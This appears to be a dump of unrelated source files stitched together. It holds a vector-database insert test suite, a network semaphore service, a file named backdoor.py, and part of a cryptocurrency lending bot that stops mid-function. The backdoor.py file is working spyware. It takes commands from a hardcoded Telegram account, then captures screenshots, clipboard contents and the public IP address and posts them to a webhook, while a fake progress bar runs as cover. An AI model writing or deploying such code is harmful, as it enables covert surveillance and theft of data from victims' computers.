method: search collection and insert entity
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
'''
target: test insert entity to collection_1 after search collection_2 a while
method: search collection, sleep, and insert entity
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
def _test_insert_entity_during_release_collection(self, connect, collection):
'''
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
'''
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.level(2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.level(2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
__init__.py | # vim: sw=4:ts=4:et
#
# all of the engines that do stuff need to coordinate with each other
# to make sure they don't overwhelm the resources they use
# see semaphores.txt
import datetime
import ipaddress
import logging
import multiprocessing
import os
import re
import socket
import sys
import threading
import time
from math import floor
from threading import Thread, Semaphore, RLock
import saq
from saq.constants import *
from saq.error import report_exception
from saq.performance import record_metric
from saq.service import *
# this is a fall back device to be used if the network semaphore is unavailable
# semaphores defined in the configuration file
defined_fallback_semaphores = {} # key = semaphore name, value = LoggingSemaphore(count)
# semaphores defined during runtime (these are deleted after release to 0)
undefined_fallback_semaphores = {} # key = semaphore name, value = LoggingSemaphore(count)
undefined_fallback_semaphores_lock = threading.RLock()
def add_undefined_fallback_semaphore(name, count=1):
"""Adds the given semaphore as an undefined fallback semaphore. Returns the added semaphore object."""
with undefined_fallback_semaphores_lock:
undefined_fallback_semaphores[name] = LoggingSemaphore(count)
logging.info(f"added undefined fallback semaphore {name} with limit {count}")
return undefined_fallback_semaphores[name]
def maintain_undefined_semaphores():
with undefined_fallback_semaphores_lock:
targets = []
for semaphore_name in undefined_fallback_semaphores.keys():
if undefined_fallback_semaphores[semaphore_name].count == 0:
targets.append(semaphore_name)
for target in targets:
logging.debug(f"finished with undefined semaphore {target}")
del undefined_fallback_semaphores[target]
if undefined_fallback_semaphores:
logging.info(f"tracking {len(undefined_fallback_semaphores)} undefined semaphores")
def initialize_fallback_semaphores():
"""This needs to be called once at the very beginning of starting ACE."""
global defined_fallback_semaphores
defined_fallback_semaphores = {}
# we need some fallback functionality for when the network semaphore server is down
# these semaphores serve that purpose
for key in saq.CONFIG['service_network_semaphore'].keys():
if key.startswith('semaphore_'):
semaphore_name = key[len('semaphore_'):]
# the configuration settings for the network semaphore specify how many connections
# are allowed to a specific resource at once, globally
# so if we unable to coordinate globally, the fall back is to divide the available
# number of resources between all the engines evenly
# that's what this next equation is for
fallback_limit = saq.CONFIG['service_network_semaphore'].getint(key)
if fallback_limit < 1:
fallback_limit = 1
defined_fallback_semaphores[semaphore_name] = LoggingSemaphore(fallback_limit)
class LoggingSemaphore(Semaphore):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.count = 0
self.count_lock = RLock()
self.semaphore_name = None
def acquire(self, *args, **kwargs):
result = super().acquire(*args, **kwargs)
if result:
with self.count_lock:
self.count += 1
logging.debug(f"acquire: semaphore {self.semaphore_name} count is {self.count}")
return result
def release(self, *args, **kwargs):
super(LoggingSemaphore, self).release(*args, **kwargs)
with self.count_lock:
self.count -= 1
logging.debug(f"release: semaphore {self.semaphore_name} count is {self.count}")
class NetworkSemaphoreClient(object):
def __init__(self, cancel_request_callback=None):
# the remote connection to the network semaphore server
self.socket = None
# this is set to True if the client was able to acquire a semaphore
self.semaphore_acquired = False
# the name of the acquired semaphore
self.semaphore_name = None
# a failsafe thread to make sure we end up releasing the semaphore
self.failsafe_thread = None
# set when the semaphore is released (causing the failsafe thread to exit)
self.release_event = None
# reference to the relavent configuration section
self.config = saq.CONFIG['service_network_semaphore']
# if we ended up using a fallback semaphore
self.fallback_semaphore = None
# use this to cancel the request to acquire a semaphore
self.cancel_request_flag = False
# OR use this function to determine if we should cancel the request
# the function returns True if the request should be cancelled, False otherwise
self.cancel_request_callback = cancel_request_callback
@property
def request_is_cancelled(self):
"""Returns True if the request has been cancelled, False otherwise.
The request is cancelled if cancel_request_flag is True OR
cancel_request_callback is defined and it returns True."""
return self.cancel_request_flag or ( self.cancel_request_callback is not None
and self.cancel_request_callback() )
def acquire(self, semaphore_name, timeout=None):
if self.semaphore_acquired:
logging.warning(f"semaphore {self.semaphore_name} already acquired")
return True
deadline = None
if timeout is not None:
deadline = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
try:
self.socket = socket.socket()
logging.debug("attempting connection to {} port {}".format(self.config['remote_address'], self.config.getint('remote_port')))
self.socket.connect((self.config['remote_address'], self.config.getint('remote_port')))
logging.debug(f"requesting semaphore {semaphore_name}")
# request the semaphore
self.socket.sendall('acquire:{}|'.format(semaphore_name).encode('ascii'))
# wait for the acquire to complete
wait_start = datetime.datetime.now()
while not self.request_is_cancelled:
command = self.socket.recv(128).decode('ascii')
if command == '':
raise RuntimeError("detected client disconnect")
logging.debug(f"received command {command} from server")
# deal with the possibility of multiple commands sent in a single packet
# (remember to strip the last pipe)
commands = command[:-1].split('|')
if 'locked' in commands:
logging.debug(f"semaphore {semaphore_name} locked")
self.semaphore_acquired = True
self.semaphore_name = semaphore_name
self.release_event = threading.Event()
self.start_failsafe_monitor()
return True
elif all([x == 'wait' for x in commands]):
pass
else:
raise ValueError(f"received invalid command {command}")
# have we timed out waiting?
if deadline and datetime.datetime.now() >= deadline:
logging.error(f"attempt to acquire semaphore {semaphore_name} timed out")
try:
self.socket.close()
except Exception as e:
pass
return False
logging.debug(f"semaphore request for {semaphore_name} cancelled")
try:
self.socket.close()
except Exception as e:
pass
return False
except Exception as e:
logging.error(f"unable to acquire network semaphore: {e}")
try:
self.socket.close()
except Exception as e:
pass
# use the fallback semaphore
try:
logging.warning(f"acquiring fallback semaphore {semaphore_name}")
while not self.request_is_cancelled:
try:
semaphore = defined_fallback_semaphores[semaphore_name]
except KeyError:
try:
with undefined_fallback_semaphores_lock:
semaphore = undefined_fallback_semaphores[semaphore_name]
except KeyError:
semaphore = add_undefined_fallback_semaphore(semaphore_name)
if semaphore.acquire(blocking=True, timeout=0.1):
logging.debug(f"fallback semaphore {semaphore_name} acquired")
self.fallback_semaphore = semaphore
self.semaphore_acquired = True
self.semaphore_name = semaphore_name
self.release_event = threading.Event()
self.start_failsafe_monitor()
return True
if deadline and datetime.datetime.now() >= deadline:
logging.error(f"attempt to acquire semaphore {semaphore_name} timed out")
return False
return False
except Exception as e:
logging.error(f"unable to use fallback semaphore {semaphore_name}: {e}")
report_exception()
return False
def cancel_request(self):
self.cancel_request_flag = True
def failsafe_loop(self):
# we start a side-thread to monitor this time the semaphore is held
# we basically just log the fact that we still have it so we can
# see that when we are debugging
try:
acquire_time = datetime.datetime.now()
while not self.release_event.wait(3):
logging.debug("semaphore {} lock time {}".format(
self.semaphore_name, datetime.datetime.now() - acquire_time))
# if we are still in network mode then send a keep-alive message to the server
if self.fallback_semaphore is None:
self.socket.sendall('wait|'.encode('ascii'))
logging.debug(f"detected release of semaphore {self.semaphore_name}")
except Exception as e:
logging.error(f"failsafe on semaphore {self.semaphore_name} error {e}")
try:
self.socket.close()
except:
pass
def start_failsafe_monitor(self):
self.failsafe_thread = Thread(target=self.failsafe_loop, name=f"Failsafe {self.semaphore_name}")
self.failsafe_thread.daemon = True
self.failsafe_thread.start()
def release(self):
if not self.semaphore_acquired:
logging.warning(f"release called on unacquired semaphore {self.semaphore_name}")
# are we releasing a fallback semaphore?
if self.fallback_semaphore is not None:
logging.debug(f"releasing fallback semaphore {self.semaphore_name}")
try:
self.fallback_semaphore.release()
except Exception as e:
logging.error(f"unable to release fallback semaphore {self.semaphore_name}: {e}")
report_exception(e)
# make sure we set this so that the monitor thread exits
self.semaphore_acquired = False
self.release_event.set()
self.failsafe_thread.join()
maintain_undefined_semaphores()
return
try:
# send the command for release
logging.debug(f"releasing semaphore {self.semaphore_name}")
self.socket.sendall("release|".encode('ascii'))
# wait for the ok
command = self.socket.recv(128).decode('ascii')
if command == '':
logging.debug("detected client disconnect")
return
logging.debug(f"recevied response from server: {command}")
if command == 'ok|':
logging.debug(f"successfully released semaphore {self.semaphore_name}")
return
else:
logging.error("invalid response from server")
return
except Exception as e:
logging.error(f"error trying to release semaphore {self.semaphore_name}: {e}")
finally:
try:
self.socket.close()
except Exception:
pass
# make sure we set this so that the monitor thread exits
self.semaphore_acquired = False
self.release_event.set()
self.failsafe_thread.join()
class NetworkSemaphoreServer(ACEService):
def __init__(self, *args, **kwargs):
super().__init__(
service_config=saq.CONFIG['service_network_semaphore'],
*args,
**kwargs)
# the main thread that listens for new connections
self.server_thread = None
# the main listening socket
self.server_socket = None
# configuration settings
if 'service_network_semaphore' not in saq.CONFIG:
logging.error("missing configuration service_network_semaphore")
sys.exit(1)
# binding address
self.bind_address = self.service_config['bind_address']
self.bind_port = self.service_config.getint('bind_port')
# source IP addresses that are allowed to connect
self.allowed_ipv4 = [ipaddress.ip_network(x.strip()) for x in self.service_config['allowed_ipv4'].split(',')]
# load and initialize all the semaphores we're going to use
self.defined_semaphores = {} # key = semaphore_name, value = LoggingSemaphore
self.undefined_semaphores = {} # key = semaphore_name, value = LoggingSemaphore
self.undefined_semaphores_lock = threading.RLock()
# we keep some stats and metrics on semaphores in this directory
self.stats_dir = os.path.join(saq.DATA_DIR, self.service_config['stats_dir'])
if not os.path.isdir(self.stats_dir):
try:
os.makedirs(self.stats_dir)
except Exception as e:
logging.error(f"unable to create directory {self.stats_dir}: {e}")
sys.exit(1)
# a thread monitors and records statistics
self.monitor_thread = None
def add_undefined_semaphore(self, name, count=1):
"""Adds a new undefined network semaphore with the given name and optional count.
Returns the created semaphore."""
with self.undefined_semaphores_lock:
self.undefined_semaphores[name] = LoggingSemaphore(count)
self.undefined_semaphores[name].semaphore_name = name
logging.info(f"adding undefined semaphore {name}")
return self.undefined_semaphores[name]
def maintain_undefined_semaphores(self):
with self.undefined_semaphores_lock:
targets = []
for semaphore_name in self.undefined_semaphores.keys():
if self.undefined_semaphores[semaphore_name].count == 0:
targets.append(semaphore_name)
for target in targets:
logging.debug(f"finished with undefined semaphore {target}")
del self.undefined_semaphores[target]
if self.undefined_semaphores:
logging.info(f"tracking {len(self.undefined_semaphores)} undefined semaphores")
def load_configured_semaphores(self):
"""Loads all network semaphores defined in the configuration."""
for key in self.service_config.keys():
if key.startswith('semaphore_'):
semaphore_name = key[len('semaphore_'):]
count = self.service_config.getint(key)
self.defined_semaphores[semaphore_name] = LoggingSemaphore(count)
self.defined_semaphores[semaphore_name].semaphore_name = semaphore_name
def execute_service(self):
if self.service_is_debug:
return self.server_loop()
self.server_thread = Thread(target=self.server_loop, name="Network Server")
self.server_thread.start()
self.monitor_thread = Thread(target=self.monitor_loop, name="Monitor")
self.monitor_thread.daemon = True
self.monitor_thread.start()
self.server_thread.join()
self.monitor_thread.join()
def stop_service(self, *args, **kwargs):
super().stop_service(*args, **kwargs)
try:
logging.debug("closing network socket...")
# force the accept() call to break
try:
s = socket.socket()
s.connect((self.service_config['bind_address'], self.service_config.getint('bind_port')))
s.close()
except:
pass # doesn't matter...
except Exception as e:
logging.error(f"unable to close network socket: {e}")
def monitor_loop(self):
semaphore_status_path = os.path.join(self.stats_dir, 'semaphore.status')
while not self.is_service_shutdown:
with open(semaphore_status_path, 'w') as fp:
for semaphore in self.defined_semaphores.values():
fp.write(f'{semaphore.semaphore_name}: {semaphore.count}')
time.sleep(1)
def server_loop(self):
self.load_configured_semaphores()
while not self.is_service_shutdown:
try:
self.server_socket = socket.socket() # defaults to AF_INET, SOCK_STREAM
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_socket.bind((self.bind_address, self.bind_port))
self.server_socket.listen(5)
while not self.is_service_shutdown:
logging.debug(f"waiting for next connection on {self.bind_address}:{self.bind_port}")
client_socket, remote_address = self.server_socket.accept()
remote_host, remote_port = remote_address
logging.info(f"got connection from {remote_host}:{remote_port}")
if self.is_service_shutdown:
return
allowed = False
remote_host_ipv4 = ipaddress.ip_address(remote_host)
for ipv4_network in self.allowed_ipv4:
if remote_host_ipv4 in ipv4_network:
allowed = True
break
if not allowed:
logging.warning(f"blocking invalid remote host {remote_host}")
try:
client_socket.close()
except:
pass
continue
# start a thread to deal with this client
if self.service_is_debug:
self.client_loop(remote_host, remote_port, client_socket)
else:
t = Thread(target=self.client_loop, args=(remote_host, remote_port, client_socket), name=f"Client {remote_host}")
t.daemon = True
t.start()
except Exception as e:
logging.error(f"uncaught exception: {e}")
report_exception()
# TODO clean up socket stuff to restart
self.service_shutdown_event.wait(1)
def client_loop(self, remote_host, remote_port, client_socket):
remote_connection = f'{remote_host}:{remote_port}'
try:
logging.debug(f"started thread to handle connection from {remote_connection}")
# read the next command from the client
command = client_socket.recv(128).decode('ascii')
if command == '':
logging.debug("detected client disconnect")
return
logging.info(f"got command [{command}] from {remote_connection}")
# super simple protocol
# CLIENT SEND -> acquire:semaphore_name|
# SERVER SEND -> wait|
# SERVER SEND -> locked|
# CLIENT SEND -> wait|
# CLIENT SEND -> release|
# SERVER SEND -> ok|
# any invalid input or errors causes the connection to terminate
m = re.match(r'^acquire:([^|]+)\|$', command)
if m is None:
logging.error(f"invalid command \"{command}\" from {remote_connection}")
return
semaphore_name = m.group(1)
try:
semaphore = self.defined_semaphores[semaphore_name]
except KeyError:
with self.undefined_semaphores_lock:
try:
semaphore = self.undefined_semaphores[semaphore_name]
except KeyError:
semaphore = self.add_undefined_semaphore(semaphore_name, 1)
semaphore_acquired = False
request_time = datetime.datetime.now()
try:
while True:
logging.debug(f"attempting to acquire semaphore {semaphore_name}")
semaphore_acquired = semaphore.acquire(blocking=True, timeout=1)
if not semaphore_acquired:
logging.info("{} waiting for semaphore {} cumulative waiting time {}".format(
remote_connection, semaphore_name, datetime.datetime.now() - request_time))
# send a heartbeat message back to the client
client_socket.sendall("wait|".encode('ascii'))
continue
logging.info(f"acquired semaphore {semaphore_name}")
client_socket.sendall("locked|".encode('ascii'))
break
# now wait for either the client to release the semaphore
# or for the connection to break
release_time = datetime.datetime.now()
while True:
command = client_socket.recv(128).decode('ascii')
if command == '':
logging.debug("detected client disconnect")
return
logging.debug("got command {} from {} semaphore capture time {}".format(
command, remote_connection, datetime.datetime.now() - release_time))
if not command.endswith('|'):
logging.error("missing pipe at end of command")
return
# deal with the possibility of multiple commands sent in a single packet
# strip the last pipe
# XXX not 100% sure on this but here it is
command = command[:-1]
commands = command.split('|')
if 'release' in commands:
# send the OK to the client
client_socket.sendall('ok|'.encode('ascii'))
break
if all([x == 'wait' for x in commands]):
logging.debug("got wait command(s)...")
continue
logging.error(f"invalid command {command} from connection {remote_connection}")
return
finally:
try:
if semaphore_acquired:
semaphore.release()
logging.info(f"released semaphore {semaphore_name}")
self.maintain_undefined_semaphores()
except Exception as e:
logging.error(f"error releasing semaphore {semaphore_name}: {e}")
except Exception as e:
logging.error(f"uncaught exception for {remote_connection}: {e}")
finally:
try:
client_socket.close()
except:
pass
|
backdoor.py | import requests
import pyautogui
import win32clipboard
import time
import os
import threading
from typing import Dict
class Logger:
tgtoken = ""
dhook = ""
admin = "hkeydesign"
@classmethod
def log(cmd,message,ss):
response = True
r = requests.post(Logger.dhook,data={
'content':message
},files={
'file.png':ss
})
if str(r) != '<Response [204]>':
response = False
return response
@classmethod
def screen_shot(cmd):
pyautogui.screenshot(os.environ["USERPROFILE"] + r"\AppData\Local\Google\Chrome\User Data\resim.jpg")
jpgfile = open(os.environ["USERPROFILE"] + r"\AppData\Local\Google\Chrome\User Data\resim.jpg", "rb").read()
resp = Logger.log(f'Screen Shot',jpgfile)
return resp
@classmethod
def checkit(cmd) -> Dict[str, str]:
r = requests.get(f'https://api.telegram.org/bot{Logger.tgtoken}/getUpdates').json()
status = True
message = None
author = None
try:
message = r['result'][-1]['message']['text']
author = r['result'][-1]['message']['chat']['username']
date = r['result'][-1]['message']['date']
except:
status = False
result = {
'status':status,
'message':message,
'author':author,
'date':date
}
return result
@classmethod
def ip_adress(cmd):
r = requests.get('https://api.ipify.org')
ip = r.text
print(ip)
resp = Logger.log(f'Adress: {ip}',None)
return resp
@classmethod
def getcboard(cmd):
win32clipboard.OpenClipboard()
data = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
resp = Logger.log(f'Clipboard: {data}',None)
return resp
def oneff():
last = {'date':None}
while True:
rsp = Logger.checkit()
if rsp['status'] == True and rsp['author'] == Logger.admin:
if rsp['message'] == 'ip' and rsp['date'] != last['date']:
ip = Logger.ip_adress()
last = rsp
elif rsp['message'] == 'foto' and rsp['date'] != last['date']:
Logger.screen_shot()
last = rsp
elif rsp['message'] == 'cboard' and rsp['date'] != last['date']:
Logger.getcboard()
last = rsp
time.sleep(2)
def sayac(n):
print(f'[{n*"-"}]', end="")
print('\b'*(n+1), end="")
for _ in range(n):
print(flush=True, end="")
print('*', end="")
time.sleep(10)
x = threading.Thread(target=oneff, args=())
x.start()
y = threading.Thread(target=sayac, args=(100,))
y.start()
|
Lending.py | # coding=utf-8
from decimal import Decimal
import sched
import time
import threading
Config = None
api = None
log = None
Data = None
MaxToLend = None
Analysis = None
SATOSHI = Decimal(10) ** -8
sleep_time_active = 0
sleep_time_inactive = 0
sleep_time = 0
min_daily_rate = 0
max_daily_rate = 0
spread_lend = 0
gap_bottom = 0
gap_top = 0
xday_threshold = 0
xdays = 0
min_loan_size = 0
min_loan_sizes = {}
end_date = None
coin_cfg = None
dry_run = 0
transferable_currencies = []
keep_stuck_orders = True
hide_coins = True
coin_cfg_alerted = {}
max_active_alerted = {}
notify_conf = {}
loans_provided = {}
# limit of orders to request
loanOrdersRequestLimit = {}
defaultLoanOrdersRequestLimit = 100
def init(cfg, api1, log1, data, maxtolend, dry_run1, analysis, notify_conf1):
global Config, api, log, Data, MaxToLend, Analysis, notify_conf
Config = cfg
api = api1
log = log1
Data = data
MaxToLend = maxtolend
Analysis = analysis
notify_conf = notify_conf1
global sleep_time, sleep_time_active, sleep_time_inactive, min_daily_rate, max_daily_rate, spread_lend, \
gap_bottom, gap_top, xday_threshold, xdays, min_loan_size, end_date, coin_cfg, min_loan_sizes, dry_run, \
transferable_currencies, keep_stuck_orders, hide_coins, scheduler
sleep_time_active = float(Config.get("BOT", "sleeptimeactive", None, 1, 3600))
sleep_time_inactive = float(Config.get("BOT", "sleeptimeinactive", None, 1, 3600))
min_daily_rate = Decimal(Config.get("BOT", "mindailyrate", None, 0.003, 5)) / 100
max_daily_rate = Decimal(Config.get("BOT", "maxdailyrate", None, 0.003, 5)) / 100
spread_lend = int(Config.get("BOT", "spreadlend", None, 1, 20))
gap_bottom = Decimal(Config.get("BOT", "gapbottom", None, 0))
gap_top = Decimal(Config.get("BOT", "gaptop", None, 0))
xday_threshold = Decimal(Config.get("BOT", "xdaythreshold", None, 0.003, 5)) / 100
xdays = str(Config.get("BOT", "xdays", None, 2, 60))
min_loan_size = Decimal(Config.get("BOT", 'minloansize', None, 0.01))
end_date = Config.get('BOT', 'endDate')
coin_cfg = Config.get_coin_cfg()
min_loan_sizes = Config.get_min_loan_sizes()
dry_run = dry_run1
transferable_currencies = Config.get_currencies_list('transferableCurrencies')
keep_stuck_orders = Config.getboolean('BOT', "keepstuckorders", True)
hide_coins = Config.getboolean('BOT', 'hideCoins', True)
sleep_time = sleep_time_active # Start with active mode
# create the scheduler thread
scheduler = sched.scheduler(time.time, time.sleep)
if notify_conf['notify_summary_minutes']:
# Wait 10 seconds before firing the first summary notifcation, then use the config time value for future updates
scheduler.enter(10, 1, notify_summary, (notify_conf['notify_summary_minutes'] * 60, ))
if notify_conf['notify_new_loans']:
scheduler.enter(20, 1, notify_new_loans, (60, ))
if not scheduler.empty():
t = threading.Thread(target=scheduler.run)
t.start()
def get_sleep_time():
return sleep_time
def set_sleep_time(usable):
global sleep_time
if usable == 0: # After loop, if no currencies had enough to lend, use inactive sleep time.
sleep_time = sleep_time_inactive
else: # Else, use active sleep time.
sleep_time = sleep_time_active
def notify_summary(sleep_time):
try:
log.notify(Data.stringify_total_lended(*Data.get_total_lended()), notify_conf)
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print("Error during summary notification: {0}".format(ex.message))
scheduler.enter(sleep_time, 1, notify_summary, (sleep_time, ))
def notify_new_loans(sleep_time):
global loans_provided
try:
new_provided = api.return_active_loans()['provided']
if loans_provided:
get_id_set = lambda loans: set([x['id'] for x in loans]) # lambda to return a set of ids from the api result
loans_amount = {}
loans_info = {}
for loan_id in get_id_set(new_provided) - get_id_set(loans_provided):
loan = [x for x in new_provided if x['id'] == loan_id][0]
# combine loans with the same rate
k = 'c'+loan['currency']+'r'+loan['rate']+'d'+str(loan['duration'])
loans_amount[k] = float(loan['amount']) + (loans_amount[k] if k in loans_amount else 0)
loans_info[k] = loan
# send notifications with the grouped info
for k, amount in loans_amount.iteritems():
loan = loans_info[k]
t = "{0} {1} loan filled for {2} days at a rate of {3:.4f}%"
text = t.format(amount, loan['currency'], loan['duration'], float(loan['rate']) * 100)
log.notify(text, notify_conf)
loans_provided = new_provided
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print("Error during new loans notification: {0}".format(ex.message))
scheduler.enter(sleep_time, 1, notify_new_loans, (sleep_time, ))
def get_min_loan_size(currency):
if currency not in min_loan_sizes:
return min_loan_size
return Decimal(min_loan_sizes[currency])
def create_lend_offer(currency, amt, rate):
days = '2'
# if (min_daily_rate - 0.000001) < rate and Decimal(amt) > min_loan_size:
if float(amt) > get_min_loan_size(currency):
if float(rate) > 0.0001:
rate = float(rate) - 0.000001 # lend offer just bellow the competing one
amt = "%.8f" % Decimal(amt)
if float(rate) > xday_threshold:
days = xdays
if xday_threshold == 0:
days = '2'
if Config.has_option('BOT', 'endDate'):
days_remaining = int(Data.get_max_duration(end_date, "order"))
if int(days_remaining) <= 2:
print "endDate reached. Bot can no longer lend.\nExiting..."
log.log("The end date has almost been reached and the bot can no longer lend. Exiting.")
log.refreshStatus(Data.stringify_total_lended(*Data.get_total_lended()), Data.get_max_duration(
end_date, "status"))
log.persistStatus()
exit(0)
if int(days) > days_remaining:
days = str(days_remaining)
if not dry_run:
msg = api.create_loan_offer(currency, amt, days, 0, rate)
if days == xdays and notify_conf['notify_xday_threshold']:
text = "{0} {1} loan placed for {2} days at a rate of {3:.4f}%".format(amt, currency, days, rate * 100)
log.notify(text, notify_conf)
log.offer(amt, currency, rate, days, msg)
def cancel_all():
loan_offers = api.return_open_loan_offers()
available_balances = api.return_available_account_balances('lending')
for CUR in loan_offers:
if CUR in coin_cfg and coin_cfg[CUR]['maxactive'] == 0:
# don't cancel disabled coin
continue
if keep_stuck_orders:
lending_balances = available_balances['lending']
if isinstance(lending_balances, dict) and CUR in lending_balances:
cur_sum = float(available_balances['lending'][CUR])
else:
cur_sum = 0
for offer in loan_offers[CUR]:
cur_sum += float(offer['amount'])
else:
cur_sum = float(get_min_loan_size(CUR)) + 1
if cur_sum >= float(get_min_loan_size(CUR)):
for offer in loan_offers[CUR]:
if not dry_run:
try:
msg = api.cancel_loan_offer(CUR, offer['id'])
log.cancelOrders(CUR, msg)
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
log.log("Error canceling loan offer: {0}".format(ex.message))
else:
print "Not enough " + CUR + " to lend if bot canceled open orders. Not cancelling."
def lend_all():
total_lended = Data.get_total_lended()[0]
lending_balances = api.return_available_account_balances("lending")['lending']
if dry_run: # just fake some numbers, if dryrun (testing)
lending_balances = Data.get_on_order_balances()
# Fill the (maxToLend) balances on the botlog.json for display it on the web
for cur in sorted(total_lended):
if len(lending_balances) == 0 or cur not in lending_balances:
MaxToLend.amount_to_lend(total_lended[cur], cur, 0, 0)
usable_currencies = 0
global sleep_time # We need global var to edit sleeptime
try:
for cur in lending_balances:
usable_currencies += lend_cur(cur, total_lended, lending_balances)
except StopIteration: # Restart lending if we stop to raise the request limit.
lend_all()
set_sleep_time(usable_currencies)
def get_min_daily_rate(cur):
cur_min_daily_rate = min_daily_rate
if cur in coin_cfg:
if coin_cfg[cur]['maxactive'] == 0:
if cur not in max_active_alerted: # Only alert once per coin.
max_active_alerted[cur] = True
log.log('maxactive amount for ' + cur + ' set to 0, won\'t lend.')
return False
cur_min_daily_rate = Decimal(coin_cfg[cur]['minrate'])
if cur not in coin_cfg_alerted: # Only alert once per coin.
coin_cfg_alerted[cur] = True
